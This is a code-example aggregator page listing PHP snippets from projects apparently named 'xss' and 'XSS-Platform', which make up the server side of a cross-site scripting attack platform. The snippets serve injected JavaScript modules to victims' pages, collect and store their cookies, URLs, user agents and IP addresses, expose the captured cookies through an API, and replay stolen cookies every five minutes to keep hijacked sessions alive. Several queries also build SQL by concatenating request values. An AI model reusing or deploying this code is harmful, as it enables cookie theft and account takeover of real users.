Tb PHP代码示例 - HotExamples

示例#1

0

显示文件

文件： code.php 项目： I0T/xss

$id = Val('id', 'GET', 1);
$urlKey = Val('urlKey', 'GET');
$db = DBConnect();
$project = $db->FirstRow("SELECT * FROM " . Tb('project') . " WHERE id='{$id}' OR urlKey='{$urlKey}'");
if (empty($project)) {
    exit;
}
$moduleSetKeys = json_decode($project['moduleSetKeys'], true);
/* 模块 begin */
$moduleIds = array();
if (!empty($project['modules'])) {
    $moduleIds = json_decode($project['modules']);
}
if (!empty($moduleIds)) {
    $modulesStr = implode(',', $moduleIds);
    $modules = $db->Dataset("SELECT * FROM " . Tb('module') . " WHERE id IN ({$modulesStr})");
    if (!empty($modules)) {
        foreach ($modules as $module) {
            $module['code'] = str_replace('{projectId}', $project['urlKey'], $module['code']);
            //module里是否有配置的参数
            if (!empty($module['setkeys'])) {
                $setkeys = json_decode($module['setkeys'], true);
                foreach ($setkeys as $setkey) {
                    $module['code'] = str_replace('{set.' . $setkey . '}', $moduleSetKeys["setkey_{$module[id]}_{$setkey}"], $module['code']);
                }
            }
            echo htmlspecialchars_decode($module['code'], ENT_QUOTES);
        }
    }
}
/* 模块 end */

示例#2

0

显示文件

文件： do.php 项目： findlakes/XSS-Platform

 * OldCMS,site:http://www.oldcms.com
 */
if (!defined('IN_OLDCMS')) {
    die('Access Denied');
}
$auth = Val('auth', 'GET');
$db = DBConnect();
$project = $db->FirstRow("SELECT * FROM " . Tb('project') . " WHERE authCode='{$auth}'");
if (empty($project)) {
    exit('Auth Err.');
}
switch ($act) {
    case 'content':
    default:
        $domain = Val('domain', 'GET');
        $where = '';
        if (!empty($domain)) {
            $where .= " AND domain='{$domain}'";
        }
        $contents = $db->FirstColumn("SELECT content FROM " . Tb('project_content') . " WHERE projectId='{$project[id]}' {$where} ORDER BY id DESC");
        $data = array();
        foreach ($contents as $k => $v) {
            $row = array();
            $v = (array) json_decode($v);
            $row['url'] = $v['opener'] ? $v['opener'] : $v['toplocation'];
            $row['cookie'] = $v['cookie'];
            $data[] = $row;
        }
        echo JsonEncode($data);
        break;
}

示例#3

0

显示文件

文件： api.php 项目： I0T/xss

            }
        }
    }
    /* 模块 end */
    foreach ($keys as $key) {
        $content[$key] = Val($key, 'REQUEST');
    }
    if (in_array('toplocation', $keys)) {
        $content['toplocation'] = !empty($content['toplocation']) ? $content['toplocation'] : $content['location'];
    }
    $judgeCookie = in_array('cookie', $keys) ? true : false;
    /* cookie hash */
    $cookieHash = md5($project['id'] . '_' . $content['cookie'] . '_' . $content['location'] . '_' . $content['toplocation']);
    $cookieExisted = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('project_content') . " WHERE projectId='{$project[id]}' AND cookieHash='{$cookieHash}'");
    if (!$judgeCookie || $cookieExisted <= 0) {
        //服务器获取的content
        $serverContent = array();
        $serverContent['HTTP_REFERER'] = $_SERVER['HTTP_REFERER'];
        $referers = @parse_url($serverContent['HTTP_REFERER']);
        $domain = $referers['host'] ? $referers['host'] : '';
        $domain = StripStr($domain);
        $serverContent['HTTP_REFERER'] = StripStr($_SERVER['HTTP_REFERER']);
        $serverContent['HTTP_USER_AGENT'] = StripStr($_SERVER['HTTP_USER_AGENT']);
        $serverContent['REMOTE_ADDR'] = StripStr($_SERVER['HTTP_X_FORWARDED_FOR']);
        $values = array('projectId' => $project['id'], 'content' => JsonEncode($content), 'serverContent' => JsonEncode($serverContent), 'domain' => $domain, 'cookieHash' => $cookieHash, 'num' => 1, 'addTime' => time());
        $db->AutoExecute(Tb('project_content'), $values);
    } else {
        $db->Execute("UPDATE " . Tb('project_content') . " SET num=num+1,updateTime='" . time() . "' WHERE projectId='{$project[id]}' AND cookieHash='{$cookieHash}'");
    }
    header("Location: {$_SERVER['HTTP_REFERER']} ");
}

示例#4

0

显示文件

文件： common.php 项目： I0T/xss

<?php

/**
 * common.php 公共文件
 * ----------------------------------------------------------------
 * OldCMS,site:http://www.oldcms.com
 */
if (!defined('IN_OLDCMS')) {
    die('Access Denied');
}
if (empty($db)) {
    $db = DBConnect();
}
//项目
$projects = $db->Dataset("SELECT * FROM " . Tb('project') . " WHERE userId='" . $user->userId . "' ORDER BY id dESC");
foreach ($projects as $k => $v) {
    $projects[$k]['contentNum'] = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('project_content') . " WHERE projectId='{$v[id]}'");
}
//模块
$modules = $db->Dataset("SELECT * FROM " . Tb('module') . " WHERE userId='" . $user->userId . "' OR (isOpen=1 AND isAudit=1) ORDER BY id dESC");

示例#5

0

显示文件

文件： module.php 项目： findlakes/XSS-Platform

        $code = Val('code', 'POST');
        $values = array('title' => $title, 'description' => $description, 'userId' => $user->userId, '`keys`' => $keys, '`setkeys`' => $setkeys, 'code' => $code, 'isOpen' => $isOpen);
        $db->AutoExecute(Tb('module'), $values, 'UPDATE', " id={$id}");
        ShowSuccess('操作成功');
        break;
    case 'delete':
        if (!$user->CheckToken(Val('token', 'GET'))) {
            ShowError('操作失败');
        }
        $id = Val('id', 'GET', 1);
        $db = DBConnect();
        //读取module信息
        $module = $db->FirstRow("SELECT * FROM " . Tb('module') . " WHERE id='{$id}' AND userId='" . $user->userId . "'");
        if (empty($module)) {
            ShowError('模块不存在或没有权限');
        }
        $db->Execute("DELETE FROM " . Tb('module') . " WHERE id='{$id}'");
        ShowSuccess('操作成功');
        break;
    case 'list':
    default:
        include 'common.php';
        $smarty = InitSmarty();
        $smarty->assign('do', $do);
        $smarty->assign('show', $show);
        $smarty->assign('url', $url);
        $smarty->assign('projects', $projects);
        $smarty->assign('modules', $modules);
        $smarty->display('module.html');
        break;
}

示例#6

0

显示文件

文件： project.php 项目： I0T/xss

    case 'delcontent':
        if (!$user->CheckToken(Val('token', 'POST'))) {
            ShowError('操作失败');
        }
        $id = Val('id', 'POST');
        $db = DBConnect();
        $content = $db->FirstRow("SELECT pc.projectId FROM " . Tb('project_content') . " pc INNER JOIN " . Tb('project') . " p ON p.id=pc.projectId WHERE p.userId='" . $user->userId . "' AND pc.id='{$id}'");
        if (!empty($content)) {
            $db->Execute("DELETE FROM " . Tb('project_content') . " WHERE id='{$id}'");
        }
        echo 1;
        break;
    case 'delcontents':
        if (!$user->CheckToken(Val('token', 'POST'))) {
            ShowError('操作失败');
        }
        $ids = Val('ids', 'POST');
        $ids = explode('|', $ids);
        //删除
        $db = DBConnect();
        foreach ($ids as $id) {
            $content = $db->FirstRow("SELECT pc.projectId FROM " . Tb('project_content') . " pc INNER JOIN " . Tb('project') . " p ON p.id=pc.projectId WHERE p.userId='" . $user->userId . "' AND pc.id='{$id}'");
            if (!empty($content)) {
                $db->Execute("DELETE FROM " . Tb('project_content') . " WHERE id='{$id}'");
            }
        }
        echo 1;
        break;
    default:
        break;
}

示例#7

0

显示文件

文件： user.php 项目： I0T/xss

        $smarty->assign('emsg', $emsg);
        $smarty->assign('pmsg', $pmsg);
        $smarty->display('user_seting.html');
        exit;
        break;
    case 'submit':
        $db = DBConnect();
        $phone = Val('phone', 'POST');
        $emsg = Val('emsg', 'POST');
        $pmsg = Val('pmsg', 'POST');
        if (!empty($phone) && !preg_match('/^(\\d{11})$/', $phone)) {
            ShowError('手机格式不正确', URL_ROOT . '/index.php?do=user&act=seting', '重新填写');
        }
        //手机验证
        if ($emsg == 'on') {
            $emsg = '1';
        } else {
            $emsg = '0';
        }
        if ($pmsg == 'on') {
            $pmsg = '1';
        } else {
            $pmsg = '0';
        }
        $db->Execute("UPDATE " . Tb('user') . " SET phone='" . $phone . "',message='" . $emsg . "|" . $pmsg . "' WHERE id='" . $user->userId . "'");
        ShowSuccess('修改成功', URL_ROOT . '/index.php?do=user&act=seting');
        exit;
        break;
    default:
        break;
}

示例#8

0

显示文件

文件： keepsession.php 项目： findlakes/XSS-Platform

<?php

/**
 * keepsession.php keep session执行
 * ----------------------------------------------------------------
 */
include '../init.php';
$db = DBConnect();
$rows = $db->Dataset("SELECT * FROM " . Tb('keepsession'));
$f = new SaeFetchurl();
foreach ($rows as $row) {
    if (time() > $row['updateTime'] + 300) {
        $f->setHeader("Cookie", urldecode($row['cookie']));
        $con = $f->fetch($row['url']);
        $db->Execute("UPDATE " . Tb('keepsession') . " SET updateTime='" . time() . "' WHERE id='{$row[id]}'");
    }
}

示例#9

0

显示文件

文件： keepsession.php 项目： I0T/xss

<?php

/**
 * keepsession.php keep session请求
 * ----------------------------------------------------------------
 */
if (!defined('IN_OLDCMS')) {
    die('Access Denied');
}
$urlKey = Val('id', 'GET');
$url = Val('url', 'GET');
$cookie = Val('cookie', 'GET');
$db = DBConnect();
$project = $db->FirstRow("SELECT * FROM " . Tb('project') . " WHERE urlKey='{$urlKey}'");
if (!empty($project) && !empty($url) && !empty($cookie)) {
    $hash = md5($url . $cookie);
    $existed = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('keepsession') . " WHERE hash='{$hash}'");
    if ($existed <= 0) {
        //判断用户key session的请求数量
        $sum = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('keepsession') . " WHERE userId='{$project[userId]}'");
        if ($sum < 10) {
            $sqlValues = array('projectId' => $project['id'], 'userId' => $project['userId'], 'url' => $url, 'cookie' => $cookie, 'hash' => $hash, 'addTime' => time(), 'updateTime' => time());
            $db->AutoExecute(Tb('keepsession'), $sqlValues);
        }
    }
}

PHP Tb示例